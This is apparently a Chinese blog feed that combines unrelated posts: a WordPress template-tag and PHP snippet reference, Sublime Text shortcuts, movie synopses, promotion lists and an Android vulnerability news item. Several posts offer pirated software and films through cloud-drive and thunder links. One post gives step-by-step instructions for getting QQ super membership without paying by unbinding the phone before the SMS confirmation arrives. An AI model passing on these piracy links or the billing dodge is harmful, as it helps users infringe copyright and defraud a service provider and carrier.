[caption id="attachment_403" align="aligncenter" width="1920"]仿乌云HTML源码 仿乌云HTML源码[/caption][caption id="attachment_402" align="aligncenter" width="1920"]仿乌云HTML源码 仿乌云HTML源码[/caption]

[caption id="attachment_404" align="aligncenter" width="1920"]仿乌云HTML源码 仿乌云HTML源码[/caption]

下载地址     wooyun

 

WordPress模板基本文件




style.css 样式表文件
index.php 主页文件
single.php 日志单页文件
page.php 页面文件
archvie.php 分类和日期存档页文件
searchform.php 搜索表单文件
search.php 搜索页面文件
comments.php 留言区域文件(包括留言列表和留言框)
404.php 404错误页面
header.php 网页头部文件
sidebar.php 网页侧边栏文件
footer.php 网页底部文件




WordPress Header头部 PHP代码 (注: 也就是位于<head>和</head>之间的PHP代码)




<?php bloginfo(’name’); ?> 网站标题
<?php wp_title(); ?> 日志或页面标题
<?php bloginfo(’stylesheet_url’); ?> WordPress主题样式表文件style.css的相对地址
<?php bloginfo(’pingback_url’); ?> WordPress博客的Pingback地址
<?php bloginfo(’template_url’); ?> WordPress主题文件的相对地址
<?php bloginfo(’version’); ?> 博客的WordPress版本
<?php bloginfo(’atom_url’); ?> WordPress博客的Atom地址
<?php bloginfo(’rss2_url’); ?> WordPress博客的RSS2地址
<?php bloginfo(’url’); ?> WordPress博客的绝对地址
<?php bloginfo(’name’); ?> WordPress博客的名称
<?php bloginfo(’html_type’); ?> 网站的HTML版本
<?php bloginfo(’charset’); ?> 网站的字符编码格式




WordPress 主体模板 PHP代码




<?php the_content(); ?> 日志内容
<?php if(have_posts()) : ?> 确认是否有日志
<?php while(have_posts()) : the_post(); ?> 如果有,则显示全部日志
<?php endwhile; ?> 结束PHP函数”while<?php endif; ?> 结束PHP函数”if<?php get_header(); ?> header.php文件的内容
<?php get_sidebar(); ?> sidebar.php文件的内容
<?php get_footer(); ?> footer.php文件的内容
<?php the_time(’m-d-y’) ?> 显示格式为”02-19-08″的日期
<?php comments_popup_link(); ?> 显示一篇日志的留言链接
<?php the_title(); ?> 显示一篇日志或页面的标题
<?php the_permalink() ?> 显示一篇日志或页面的永久链接/URL地址
<?php the_category(,) ?> 显示一篇日志或页面的所属分类
<?php the_author(); ?> 显示一篇日志或页面的作者
<?php the_ID(); ?> 显示一篇日志或页面的ID
<?php edit_post_link(); ?> 显示一篇日志或页面的编辑链接
<?php get_links_list(); ?> 显示Blogroll中的链接
<?php comments_template(); ?> comments.php文件的内容
<?php wp_list_pages(); ?> 显示一份博客的页面列表
<?php wp_list_cats(); ?> 显示一份博客的分类列表
<?php next_post_link(%link ‘) ?> 下一篇日志的URL地址
<?php previous_post_link(%link’) ?> 上一篇日志的URL地址
<?php get_calendar(); ?> 调用日历
<?php wp_get_archives() ?> 显示一份博客的日期存档列表
<?php posts_nav_link(); ?> 显示较新日志链接(上一页)和较旧日志链接(下一页)
<?php bloginfo(’description’); ?> 显示博客的描述信息




其它的一些WordPress模板代码




/%postname%/ 显示博客的自定义永久链接
<?php the_search_query(); ?> 搜索表单的值
<?php _e(’Message’); ?> 打印输出信息
<?php wp_register(); ?> 显示注册链接
<?php wp_loginout(); ?> 显示登入/登出链接
<!–next page–> 在日志或页面中插入分页
<!–more–> 截断日志
<?php wp_meta(); ?> 显示管理员的相关控制信息
<?php timer_stop(1); ?> 显示载入页面的时间
<?php echo get_num_queries(); ?> 显示载入页面查询




 

1. wordpress调用最新文章

WordPress最新文章的调用可以使用一行很简单的模板标签wp_get_archvies来实现. 代码如下:

<?php get_archives(‘postbypost’, 10); ?> (显示10篇最新更新文章)

或者

<?php wp_get_archives(‘type=postbypost&limit=20&format=custom’); ?>

后面这个代码显示你博客中最新的20篇文章,其中format=custom这里主要用来自定义这份文章列表的显示样式。具体的参数和使用方法你可 以参考官方的使用说明- wp_get_archvies。(fromat=custom也可以不要,默认以UL列表显示文章标题。)

补充: 通过WP的query_posts()函数也能调用最新文章列表, 虽然代码会比较多一点,但可以更好的控制Loop的显示,比如你可以设置是否显示摘要。具体的使用方法也可以查看官方的说明。

2. wordpress调用随机文章

<?php
$rand_posts = get_posts(‘numberposts=10&orderby=rand’);
foreach( $rand_posts as $post ) :
?>
<!–下面是你想自定义的Loop–>
<li><a href=<?php the_permalink(); ?>><?php the_title(); ?></a></li>
<?php endforeach; ?>

3. wordpress调用最新留言

下面是我之前在一个WordPress主题中代到的最新留言代码,具体也记不得是哪个主题了。该代码直接调用数据库显示一份最新留言。其中 LIMIT 10限制留言显示数量。绿色部份则是每条留言的输出样式。

<?php
global $wpdb;
$sql = “SELECT DISTINCT ID, post_title, post_password, comment_ID,
comment_post_ID, comment_author, comment_date_gmt, comment_approved,
comment_type,comment_author_url,
SUBSTRING(comment_content,1,30) AS com_excerpt
FROM $wpdb->comments
LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID =
$wpdb->posts.ID)
WHERE comment_approved =1′ AND comment_type = ” AND
post_password = ”
ORDER BY comment_date_gmt DESC
LIMIT 10;
$comments = $wpdb->get_results($sql);
$output = $pre_HTML;   foreach ($comments as $comment) {
$output .= “n<li>.strip_tags($comment->comment_author)
.:.<a href=" . get_permalink($comment->ID) .
“#comment-” . $comment->comment_ID . “” title=”on ” .
$comment->post_title . “”>” . strip_tags($comment->com_excerpt)
.”</a></li>”;
}   $output .= $post_HTML;
echo $output;?>

4.wordpress调用相关文章

在文章页显示相关文章

<?php

$tags = wp_get_post_tags($post->ID);

if ($tags) {

$first_tag = $tags[0]->term_id;

$args=array(

‘tag__in’ => array($first_tag),

‘post__not_in’ => array($post->ID),

‘showposts’=>10,

‘caller_get_posts’=>1

);

$my_query = new WP_Query($args);

if( $my_query->have_posts() ) {

while ($my_query->have_posts()) : $my_query->the_post(); ?>

<li><a href=<?php the_permalink() ?>” rel=”bookmark” title=<?php the_title_attribute(); ?>><?php the_title();?> <?php comments_number(‘ ‘,(1),'(%)’); ?></a></li>

<?php

endwhile;

}

}

wp_reset_query();

?>

5.wordpress调用指定分类的文章

<?php $posts = get_posts( “category=4&numberposts=10); ?>
<?php if( $posts ) : ?>
<ul><?php foreach( $posts as $post ) : setup_postdata( $post ); ?>
<li>
<a href=<?php the_permalink() ?>” rel=”bookmark” title=<?php the_title(); ?>><?php the_title(); ?></a>
</li>
<?php endforeach; ?>
</ul>
<?php endif; ?>

6.wordpress去评论者链接的评论输出

<?php

global $wpdb;

$sql = “SELECT DISTINCT ID, post_title, post_password, comment_ID,

comment_post_ID, comment_author, comment_date_gmt, comment_approved,

comment_type,comment_author_url,

SUBSTRING(comment_content,1,14) AS com_excerpt

FROM $wpdb->comments

LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID =

$wpdb->posts.ID)

WHERE comment_approved =1′ AND comment_type = ” AND

post_password = ”

ORDER BY comment_date_gmt DESC

LIMIT 10;

$comments = $wpdb->get_results($sql);

$output = $pre_HTML;

foreach ($comments as $comment) {

$output .=\n<li>.strip_tags($comment->comment_author)

.:.<a href=\" . get_permalink($comment->ID) .

“#comment-” . $comment->comment_ID . “\”title=\”on ” .

$comment->post_title . “\”>” . strip_tags($comment->com_excerpt)

.”</a></li>”;

}

$output .= $post_HTML;

echo $output;?>

7.wordpress调用含gravatar头像的评论输出

<?php

global $wpdb;

$sql = “SELECT DISTINCT ID, post_title, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved,comment_author_email, comment_type,comment_author_url, SUBSTRING(comment_content,1,10) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID = $wpdb->posts.ID) WHERE comment_approved =1′ AND comment_type = ” AND comment_author != ‘郑 永’ AND post_password = ” ORDER BY comment_date_gmt DESC LIMIT 10;

$comments = $wpdb->get_results($sql);

$output = $pre_HTML;

foreach ($comments as $comment) {

$output .=\n<li>.get_avatar(get_comment_author_email(‘comment_author_email’), 18).<a href=\" . get_permalink($comment->ID) . “#comment-” . $comment->comment_ID . “\”title=\”" . $comment->post_title . ” 上的评论\>. strip_tags($comment->comment_author) .”: “. strip_tags($comment->com_excerpt) .</a></li>;

}

$output .= $post_HTML;

$output = convert_smilies($output);

echo $output;

?>

上面代码把comment_author的值改成你的ID,18是头像大小,10是评论数量。

8.wordpress调用网站统计大全

1、日志总数:

<?php $count_posts = wp_count_posts(); echo $published_posts = $count_posts->publish;?>

2、草稿数目:

<?php $count_posts = wp_count_posts(); echo $draft_posts = $count_posts->draft; ?>

3、评论总数:

<?php echo $wpdb->get_var(“SELECT COUNT(*) FROM $wpdb->comments”);?>

4、成立时间:

<?php echo floor((time()-strtotime(2008-8-18))/86400); ?>

5、标签总数:

<?php echo $count_tags = wp_count_terms(‘post_tag’); ?>

6、页面总数:

<?php $count_pages = wp_count_posts(‘page’); echo $page_posts = $count_pages->publish; ?>

7、分类总数:

<?php echo $count_categories = wp_count_terms(‘category’); ?>

8、链接总数:

<?php $link = $wpdb->get_var(“SELECT COUNT(*) FROM $wpdb->links WHERE link_visible = ‘Y’”); echo $link; ?>

 

9、用户总数:

<?php $users = $wpdb->get_var(“SELECT COUNT(ID) FROM $wpdb->users”); echo $users; ?>

 

10、最后更新:

<?php $last = $wpdb->get_results(“SELECT MAX(post_modified) AS MAX_m FROM $wpdb->posts WHERE (post_type = ‘post’ OR post_type = ‘page’) AND (post_status = ‘publish’ OR post_status =private));$last = date(‘Y-n-j’, strtotime($last[0]->MAX_m));echo $last; ?>

9.wordpress判断语句

is_single()

判断是否是具体文章的页面

is_single(’2′)

判断是否是具体文章(id=2)的页面

is_single(’Beef Stew’)

判断是否是具体文章(标题判断)的页面

is_single(’beef-stew’)

判断是否是具体文章(slug判断)的页面

comments_open()

是否留言开启

pings_open()

是否开启ping

is_page()

是否是页面

is_page(’42′)

id判断,即是否是id为42的页面

is_page(’About Me’)

判断标题

is_page(’about-me’)

slug判断

is_category()

是否是分类

is_category(’6′)

id判断,即是否是id为6的分类

is_category(’Cheeses’)

分类title判断

is_category(’cheeses’)

分类 slug判断

in_category(’5′)

判断当前的文章是否属于分类5

is_author()

将所有的作者的页面显示出来

is_author(’1337′)

显示author number为1337的页面

is_author(’Elite Hacker’)

通过昵称来显示当前作者的页面

is_author(’elite-hacker’)

下面是通过不同的判断实现以年、月、日、时间等方式来显示归档

is_date()

is_year()

is_month()

is_day()

is_time()

判断当前是否是归档页面

is_archive()

判断是否是搜索

is_search()

判断页面是否404

is_404()

判断是否翻页,比如你当前的blog是http://domain.com 显示http://domain.com?paged=2的时候,这个判断将返 回真,通过这个函数可以配合is_home来控制某些只能在首页显示的界面,

例如:




<?php if(is_single()):?>




//这里写你想显示的内容,包括函数




<?php endif;?>




或者:




<?php if(is_home() && !is_paged() ):?>




//这里写你想显示的内容,包括函数




<?php endif;?>




10.wordpress 非插件调用评论表情

<!–smilies–>
<?php

function wp_smilies() {

global $wpsmiliestrans;

if ( !get_option(‘use_smilies’) or (empty($wpsmiliestrans))) return;

$smilies = array_unique($wpsmiliestrans);

$link=;

foreach ($smilies as $key => $smile) {

$file = get_bloginfo(‘wpurl’)./wp-includes/images/smilies/.$smile;

$value = ” “.$key.” “;

$img =<img src=\{$file}\” alt=\{$smile}\/>;

$imglink = htmlspecialchars($img);

$link .=<a href=\”#commentform\” title=\{$smile}\” onclick=\”document.getElementById(‘comment’).value +={$value}\>{$img}</a> ”;

}

echo ‘<div>.$link.</div>;

}

?>

<?php wp_smilies();?>

<!–smilies—>

 

将以上代码复制到 comments.php 中合适的位置。

QQ宣布了QQ群开放的消息,办公、游戏和教育类的应用,是QQ群开放后鼓励的三个方向。这可能是QQ发展史上最为重要的一次开放。
微信做连接,QQ做移动社群
微信+朋友圈+订阅号,通过广点通、赞赏和外接广告获取收入;那么QQ则是QQ群+兴趣部落+订阅号,通过QQ群支付,部落打赏获得收入。
使用手机QQ的用户,超过半成以上是90后和00后用户。70后、80后们在用微信聊天,刷朋友圈,看微信订阅号;90后、00后们在用QQ聊天,组成QQ群,加入各种兴趣部落,群主和酋长们再用QQ订阅号来触达(push)用户。
2014年,QQ找到了自己新的定位以及与微信的差异化:年轻。2015年,QQ寻求年轻人之上的生态建设:月活3.8亿的qq群、20万兴趣部落,以及 内测中的QQ订阅号,共同构成QQ的三驾马车。同时,QQ将开放QQ群的关系链、消息触达和支付能力,允许开发者接入应用,鼓励酋长通过打赏获得收入。
同样实现5亿用户,微信用了4年,而QQ用了十几年。
在近日的腾讯移动社群峰会上,腾讯高级执行副总裁汤道生表示,在今年三季度或四季度,QQ将推出公众号服务,形成以“群+应用+兴趣部落+公众号”的QQ社群体系。

ublime text 3063 中文汉化破解版 下载地址  (包括win 32位  64位  linux32位 64位  和 mac 所有版本下载)sublime text 3063 中文 破解版下载 【百度网盘 如果打不开 请用下面备用地址】 sublime text 3062 中文汉化破解版 下载地址  (包括win 32位  64位  linux32位 64位  和 mac 所有版本下载)sublime text 3062 中文 破解版下载【百度网盘 如果打不开 请用下面备用地址】

 

其他网盘下载

http://1drv.ms/T8CZMf

链接: http://pan.baidu.com/s/1bngtHBT 密码: zvqk

快捷键:

选择类

Ctrl+D 选中光标所占的文本,继续操作则会选中下一个相同的文本。

Alt+F3 选中文本按下快捷键,即可一次性选择全部的相同文本进行同时编辑。举个栗子:快速选中并更改所有相同的变量名、函数名等。

Ctrl+L 选中整行,继续操作则继续选择下一行,效果和 Shift+↓ 效果一样。

Ctrl+Shift+L 先选中多行,再按下快捷键,会在每行行尾插入光标,即可同时编辑这些行。

Ctrl+Shift+M 选择括号内的内容(继续选择父括号)。举个栗子:快速选中删除函数中的代码,重写函数体代码或重写括号内里的内容。

Ctrl+M 光标移动至括号内结束或开始的位置。

Ctrl+Enter 在下一行插入新行。举个栗子:即使光标不在行尾,也能快速向下插入一行。

Ctrl+Shift+Enter 在上一行插入新行。举个栗子:即使光标不在行首,也能快速向上插入一行。

Ctrl+Shift+[ 选中代码,按下快捷键,折叠代码。

Ctrl+Shift+] 选中代码,按下快捷键,展开代码。

Ctrl+K+0 展开所有折叠代码。

Ctrl+← 向左单位性地移动光标,快速移动光标。

Ctrl+→ 向右单位性地移动光标,快速移动光标。

shift+↑ 向上选中多行。

shift+↓ 向下选中多行。

Shift+← 向左选中文本。

Shift+→ 向右选中文本。

Ctrl+Shift+← 向左单位性地选中文本。

Ctrl+Shift+→ 向右单位性地选中文本。

Ctrl+Shift+↑ 将光标所在行和上一行代码互换(将光标所在行插入到上一行之前)。

Ctrl+Shift+↓ 将光标所在行和下一行代码互换(将光标所在行插入到下一行之后)。

Ctrl+Alt+↑ 向上添加多行光标,可同时编辑多行。

Ctrl+Alt+↓ 向下添加多行光标,可同时编辑多行。

编辑类

Ctrl+J 合并选中的多行代码为一行。举个栗子:将多行格式的CSS属性合并为一行。

Ctrl+Shift+D 复制光标所在整行,插入到下一行。

Tab 向右缩进。

Shift+Tab 向左缩进。

Ctrl+K+K 从光标处开始删除代码至行尾。

Ctrl+Shift+K 删除整行。

Ctrl+/ 注释单行。

Ctrl+Shift+/ 注释多行。

Ctrl+K+U 转换大写。

Ctrl+K+L 转换小写。

Ctrl+Z 撤销。

Ctrl+Y 恢复撤销。

Ctrl+U 软撤销,感觉和 Gtrl+Z 一样。

Ctrl+F2 设置书签

Ctrl+T 左右字母互换。

F6 单词检测拼写

搜索类

Ctrl+F 打开底部搜索框,查找关键字。

Ctrl+shift+F 在文件夹内查找,与普通编辑器不同的地方是sublime允许添加多个文件夹进行查找,略高端,未研究。

Ctrl+P 打开搜索框。举个栗子:1、输入当前项目中的文件名,快速搜索文件,2、输入@和关键字,查找文件中函数名,3、输入:和数字,跳转到文件中该行代码,4、输入#和关键字,查找变量名。

Ctrl+G 打开搜索框,自动带:,输入数字跳转到该行代码。举个栗子:在页面代码比较长的文件中快速定位。

Ctrl+R 打开搜索框,自动带@,输入关键字,查找文件中的函数名。举个栗子:在函数较多的页面快速查找某个函数。

Ctrl+: 打开搜索框,自动带#,输入关键字,查找文件中的变量名、属性名等。

Ctrl+Shift+P 打开命令框。场景栗子:打开命名框,输入关键字,调用sublime text或插件的功能,例如使用package安装插件。

Esc 退出光标多行选择,退出搜索框,命令框等。

显示类

Ctrl+Tab 按文件浏览过的顺序,切换当前窗口的标签页。

Ctrl+PageDown 向左切换当前窗口的标签页。

Ctrl+PageUp 向右切换当前窗口的标签页。

Alt+Shift+1 窗口分屏,恢复默认1屏(非小键盘的数字)

Alt+Shift+2 左右分屏-2列

Alt+Shift+3 左右分屏-3列

Alt+Shift+4 左右分屏-4列

Alt+Shift+5 等分4屏

Alt+Shift+8 垂直分屏-2屏

Alt+Shift+9 垂直分屏-3屏

Ctrl+K+B 开启/关闭侧边栏。

F11 全屏模式

Shift+F11 免打扰模式

 

emmet快捷键查询http://emmet.evget.com/

[caption id="attachment_374" align="aligncenter" width="393"][科幻片] [在线/下载][高清]机器人帝国 [科幻片] [在线/下载][高清]机器人帝国[/caption] 

 

 

导演: 乔·怀特
编剧: 乔·怀特 / Mark Stay
主演: 吉莲·安德森 / 本·金斯利 / 卡兰·麦克奥利菲 / 杰拉丁妮·詹姆斯 / 斯蒂文·麦金托什 / 更多...
类型: 动作 / 科幻 / 冒险
制片国家/地区: 英国
语言: 英语
上映日期: 2015-03-27(英国)
片长: 90分钟
又名: Our Robot Overlords
剧情简介  ·  ·  ·  ·  ·  ·
三年前,外星机器人入侵地球,经过七天的战斗地球被完全占领。从此之后,机器人对人类严加看管,它们向人类头上安装了定位系统,一旦检测到人类走出家门便将其毁灭。除此之外,外星人雇佣罗宾(本·金斯利 Ben Kingsley 饰)等人类叛徒担任辅助管理工作。罗宾迷恋美丽的妇人凯特(吉莲·安德森 Gillian Anderson 饰),但凯特只痴心等待失踪的丈夫归来。罗宾口口声声称凯特的丈夫早已遇害,不过她的儿子西恩(Callan McAuliffe 饰)并不相信,男孩始终未放弃寻找父亲的努力。某天,西恩意外和康纳(Milo Parker 饰)等伙伴发现令定位系统失效的办法。
孩子们尝试着走出家门,这一变故也让推翻机器人的统治成为可能…

 

(下载后,请把拓展名MP41改成MP4即可)
720P链接:http://pan.baidu.com/s/1bnjUOJd 密码:4s1x
1080P链接:http://pan.baidu.com/s/1sjuXIR7 密码:yx7n

淘宝买的,买到后感觉没啥用处,而且楼主也没空间。。。分享给需要的朋友。

开过网店的应该都知道,尤其是卖虚拟商品的朋友!卡密自动发货是必不可少的技能,比较有名的像闪点卡密、第五代等等……

据宝贝详情
升级内容:
增加“黑名单”菜单,添加买家ID后该买家无法提货;
增加卡密形式查看方式,按宝贝查看,方便管理卡密,显示该宝贝已发卡密、未发卡密及全部库存数量;
增加卡密按宝贝查看导出已发、未发及全部库存为txt文本;
增加一键删除该宝贝的卡密库存;
修复前台提取页面显示下载地址中空格为+号问题。
修复发货记录中IP地址显示不完整的问题;
修复发货记录信息量过大显示不完整的问题。
删除宝贝的同时删除此宝贝相关的卡密和下载;
修复导入mysql.txt数据出错问题。


你们自己好好搞吧,有什么问题不要问我,我也不懂~
请各位朋友多多评分,积分留在手里不用就浪费了。
楼主想要升级用户组,评分!!!
链接: http://pan.baidu.com/s/1hquAl5E 密码: 577d

1,【法尔胜】,回复“红包,每天3次机会,截止23日

 

2,【cc卡美珠宝】,18日8点回复七夕,截止20日

 

3,【建水摩卡小镇】,18日9:10点击菜单栏有奖活动-每日红包,每天300个

 

4,【好好租】,18日10点点击菜单栏抢红包,截止20日

 

5,【西欧汇馆】,每天中午12:00点击菜单栏每日红包

 

6,【爱一夏音乐节】,18日16点回复我要红包,每天1000元,截止8月21日

 

7,【承德香江家居品牌工厂批发城】,18日17点回复XJ,点击推送,转发给朋友可再得红包,截止28日

 

9,【长兴·星城】,18日-26日每晚19:00开始,每天一场,每场发放2000多个同享红包,还可以分裂出6000多个红包

 

10,【昆明人民路壹号广场】,17日20点点击菜单

 

11,【大新百汇】,18日20:30回复红包,截止19日

 

12,【家在宁波网】,18日14:00回复博府丽景湾

 

13,【心意点点】,点击历史消息第一条-我拿红包

 

14,【分众专享】,点击菜单栏:有钱大家赚,18日6000个微信红包

 

15,萝卜玩app下载以及准点送微信红包,详情见其公众号

 

16,【医事帮帮忙 】,首页发表问题,切换到小号,回答问题,前一个微信号会收到答案,选择采纳提问时要使用5元优惠券,即0元提问,时间选择1天内,次日到余额可提现

 

17,【诸葛理财】,点击菜单栏七夕礼物

 

18,【CFYIDONG意动】,回复砸金蛋,每天两次机会

 

19,【长城人寿】回复长城幸运星后得流量,18日,25日可以累积领取

 

20,【爱游戏】,点击推送链接,第一次抽奖领取同程红包后第二次抽有机会得红包,截止8.28

1,  微信打开链接。http://wap.newnewbank.com/userRegister.html

2,点击app【个人中心】-【账户设置】完成实名认证

3,点击app【首页】,找到幻灯图片(拉上好友抢现金)这个进入活动页面,并点击邀请好友奖励记录

4,点击领取那个5元即可,奖励实时到账,现在可以去绑定银行卡提现了。

5,这时它会送你特权金4000元,你就进去投资即可,到期收益7块多。也可以提现。

 

QQ会员好莱坞观影特权 免费领取7天好莱坞会员 速度抢
本活动正是上次爆BUG的活动,不过BUG显然已经修复
如果上次没有领取到7天的 今天还可以速度领哦  亲测的  ,腾讯刚刚补仓。

 

2015年6月22日 补仓置顶   感谢 Gone with thw wind 投递

 

看图 刚刚补仓
看数量19868个 显然刚刚补仓
领取截图
活动地址:http://film.qq.com/topic/2015/hlwvip.html 每周一 10点开启

 

之前漏洞 http://www.iqshw.com/qqnews/2015/0603/96616.html【已和谐,且回收】
 

OPPO R7 好莱坞会员活动抢兑换工具免费下载 无需下载模拟器
软件是根据 前几天发的 手动教程 OPPO R7 撸半年好莱坞会员活动 来弄的。
投递者 测试好用 ,当然了 目前这个活动 根据群内截图反馈。 准点不一定放水,有时候是准点前后几分钟。
当然了 软件不保证可以抢到,介意的可以手动操作。 推荐教程 模拟器领华为荣耀4X 好莱坞会员6个月  目前没黄 就是 改数据麻烦,太多被使用的了。

 

软件截图
8月17日领晨 测试截图 (点击下图 看大图)  建议整点 或者 整点 前后几分钟撸!!!
软件是易语言 可能报毒 介意的勿下
爱Q提醒:部分教程和软件中可能含有投递者个人宣传广告/QQ,QQ群等联系方式,如涉及交易请谨慎对待!

 

广告太多 本文评论关闭!
标签: 好莱坞   活动软件



文章附件下载地址1  下载地址2

夏士莲绿书包行动 抽奖送好莱坞会员1个月 参与公益行等
小行动大不同 为山区捐书本,是夏士莲官方的活动,活动投递者说他中奖了,然后我就拿3个号去测试概率,结果也中了
我人品好么?给群里的朋友测试 说黑脸不中,所以我也不说推荐参与怎么,有兴趣的试试。反正参与就直接可以免费抽奖3次。
感谢   @爱Q网-pp  投递。

 

活动截图
登陆就3次抽奖机会、
概率看人品,不保证都可以中,我反正中奖了 (非秒到,活动结束后发奖)

导演: 梁乐民 / 陆剑青
编剧: 梁乐民 / 陆剑青
主演: 张学友 / 张家辉 / 余文乐 / 王学圻 / 池珍熙 / 更多...
类型: 剧情 / 动作 / 悬疑 / 犯罪
制片国家/地区: 香港
语言: 汉语普通话 / 粤语 / 韩语 / 英语
上映日期: 2015-04-30(中国大陆/香港)
片长: 119分钟
又名: 大峡谷 / 赤盗 / Helios
IMDb链接: tt3614922
赤道的剧情简介 · · · · · ·
韩国秘密核武器神秘失踪,同时载着军方手提装置的飞机在境内坠毁。韩方接到消息,一名绰号“赤道”的国际通缉犯(张震 饰)带着助手“信差”(文咏珊 饰)将于本港实行秘密武器交易,韩国武器专家崔民号(池珍熙 饰)与特工朴宇哲(崔始源 饰)奉命前往调查。本港反恐特勤组主管李彦明(张家辉 饰)与督察范家明(余文乐 饰)协助韩方寻找武器,而核物理教授肇志仁(张学友 饰)也受邀协助判案。武器很快被寻回,没想到竟还隐藏着潜在危机。正当香港及韩国警方决定送还武器回韩国之际,安全局高管(王学圻 饰)带着助手袁小姐(冯文娟 饰)突然出现,三方陷入周旋之中,“赤道”一伙更进一步的阴谋也开始实施……

介绍完毕 。。。放连接

【下载地址】

BD1280高清国粤双语中字.mp4

thunder://QUFlZDJrOi8vfGZpbGV8JUU4JUI1JUE0JUU5JTgxJTkzLkJEMTI4MCVFOSVBQiU5OCVFNiVCOCU4NSVFNSU5QiVCRCVFNyVCMiVBNCVFNSU4RiU4QyVFOCVBRiVBRCVFNCVCOCVBRCVFNSVBRCU5Ny5tcDR8MTY3MzYyNzI0MHwxQkE2QjkyNTQxMzdEMDRGRjg1MDNDNUQyN0Q2QjY2N3xoPUhBNkNBV1lDNVdJWjRMWjRDVEpDRzczRk9SNTZHWVhHfC9aWg==

BD1280超清国粤双语中字.mp4

thunder://QUFlZDJrOi8vfGZpbGV8JUU4JUI1JUE0JUU5JTgxJTkzLkJEMTI4MCVFOCVCNiU4NSVFNiVCOCU4NSVFNSU5QiVCRCVFNyVCMiVBNCVFNSU4RiU4QyVFOCVBRiVBRCVFNCVCOCVBRCVFNSVBRCU5Ny5tcDR8MjU1NzI3NzU3NnwxNEFBRkQ2NEFCQzFCNzg2NTEwMENGNkY2NzI4RTUyQ3xoPTJEUVZCTllQS0ZGV1dRWTdHUjdVS0FWQlMzVFQ3RFNUfC9aWg==

 

 

8月17日消息,安卓系统最近可谓是风声不断,除了Trend Micro(杀毒软件)公司在7月份发现的“Stagefright”和“Mediaserver”两大Android漏洞,今天该公司又公布,新发现了安卓的两个新的薄弱点。

一个薄弱点是CVE-2015-3839,如果黑客利用CVE-2015-3839,将带有恶意代码的信息插入到安卓的信息执行程序中,那么虽然设备整体不会出现什么问题,但是信息执行应用就会受到攻击,从而导致不能收发短信。

另 外一个薄弱点是CVE-2015-3840,这种漏洞可能会改变收发短信和彩信等的显示日期以及收发状态。如此一来,用户的隐私信息就得不到保护。如果攻 击者利用恶意应用,来监视使用者的信息,并进行修改,那么用户的短信就会被自动发送,如果发送到会产生高额费用的号码上,就会引起用户不必要的损失。

这两个安卓漏洞均存在于信息组件之中,从而使安卓整体版本受到影响。据说Trend Micro已经将相应情况报告给了谷歌。除了以上两个漏洞外,以下还有最近曝光率很高的几个重要漏洞:

Stagefright漏洞

影响安卓2.2到5.1.1之间的所有系统版本,黑客可以通过一段包含特定格式编码信息的文件,可以在用户没有察觉的情况下,神不知鬼不觉的“黑”掉电话,窃取用户信息,甚至导致设备变砖。

Certifi-gate漏洞

所有的OEM厂商可能都受到了感染,它让第三方程序插件通过Remote Support得到存取权限,控制设备的屏幕和使用OEM发出的授权证书。

mediaserver漏洞

安卓4.3到5.1.1所有版本,mediaserver在处理畸形MKV文件时,在实现上存在整数溢出漏洞,远程攻击者通过恶意的安卓app或构造的网站,利用此漏洞可造成受影响设备不响应,无法接打电话。

0day漏洞

这个漏洞存在于安卓系统中Google Admin应用程序处理一些URL的方式中,攻击者甚至可以通过这个漏洞绕过沙箱机制。

目前安卓系统用户数量激增,难免会成为黑客门攻击的对象,相关漏洞的曝光也会愈发频繁和密集。大家也要密切关注并及时升级更新,以保证自身数据和信息安全。

第一步:用自己的手机绑定号要刷的QQ号码!
第二步:编辑短信:SVIP13 发送到 10661700(等待消息,会比较慢,
5-8分钟左右,“您即将定制由深圳腾讯公司提供的QQ超级会员2013计划抢先体验版,回复“是”订购! :10661700”,这是回复“是”!)
第三步:打开网址:http://bd.qq.com/bind.shtml
(解除手机绑定!记住,一定要快!要在开通超级会员成功这条信息发过来之前解除成功!这一步至关重要)
第四步:解除成功,随后“您已成功定制由腾讯……”这条信息就会来,然后发送0000到10086!如果没有业务,就成功一半了!
第五步:打开网址:http://bd.qq.com/bind.shtml(绑定自己刚刚刷超级会员的手机号码!成功后就OK!)
第六步:恭喜你,永久超级会员刷取成功

无需密码强制在好友QQ空间发布说说 尽情的恶搞吧 不知算不算BUG



简单说下本教程可以实现效果

QQ-A,在自己QQ空间发说说,可以生成一条说说到QQ-B的说说界面,类似QQ-B自己发布的一样!

 

本教程可以用来装逼 可以用来恶搞,但是请勿用来骗人。


操作方法如下

1:打开自己QQ空间  点击时光轴
2: 发布时间轴,添加好友,如下图 (这是别人在自己空间,拉亮亮的QQ测试)
3:对方搞完后,亮亮进入自己的QQ空间说说主页
4:神奇的事情发生了,刚刚对方发的 时光轴 自动到我的说说了(未公开),当然 只能自己可以看见,自己好友看不到。
注:非QQ好友没有效果。

 

好了还是那句话  本教程可以用来装逼 可以用来恶搞,但是请勿用来骗人。

 

本文教程截图有投递者个人宣传广告/QQ,QQ群等联系方式,如涉及交易请谨慎对待!

导演: 郑保瑞
编剧: 黄英 / 梁礼彦
主演: 吴京 / 托尼·贾 / 张晋 / 任达华 / 卢惠光 / 更多...
类型: 剧情 / 动作 / 犯罪
制片国家/地区: 香港 / 中国大陆
语言: 汉语普通话
上映日期: 2015-06-18(中国大陆)
片长: 120分钟
又名: 杀破狼2之杀无赦 / SPL 2: A Time For Consequences
IMDb链接: tt3197766
杀破狼2的剧情简介 · · · · · ·
香港卧底探员志杰(吴京 饰)不惜变成瘾君子,潜伏犯罪集团侦查幕后主脑洪先生(古天乐 饰);直属上司兼叔父华哥(任达华 饰)决定终止行动,志杰却身份败露且人间蒸发。华哥违抗命令私自搜寻,辗转得悉志杰已被关进泰国某监狱,遂只身前赴营救。
泰国警察阿猜(托尼·贾 饰)为筹钱医 治患血癌的女儿转任狱警,负责看管志杰。志杰与阿猜语言不通、身份对立,却竟是唯一可拯救阿猜女儿的骨髓捐赠者,阿猜必须保住志杰的性命;但狱长(张晋 饰)为确保幕后交易运作正常,必须铲除志杰。
身体虚弱的洪先生带同胞弟(恭硕良 饰)突然出现,准备进行心脏移植手术自救;原来整个监狱是洪先生操控的活人体器官供应市场……

【下载地址】


HD1280高清国语中字.mp4

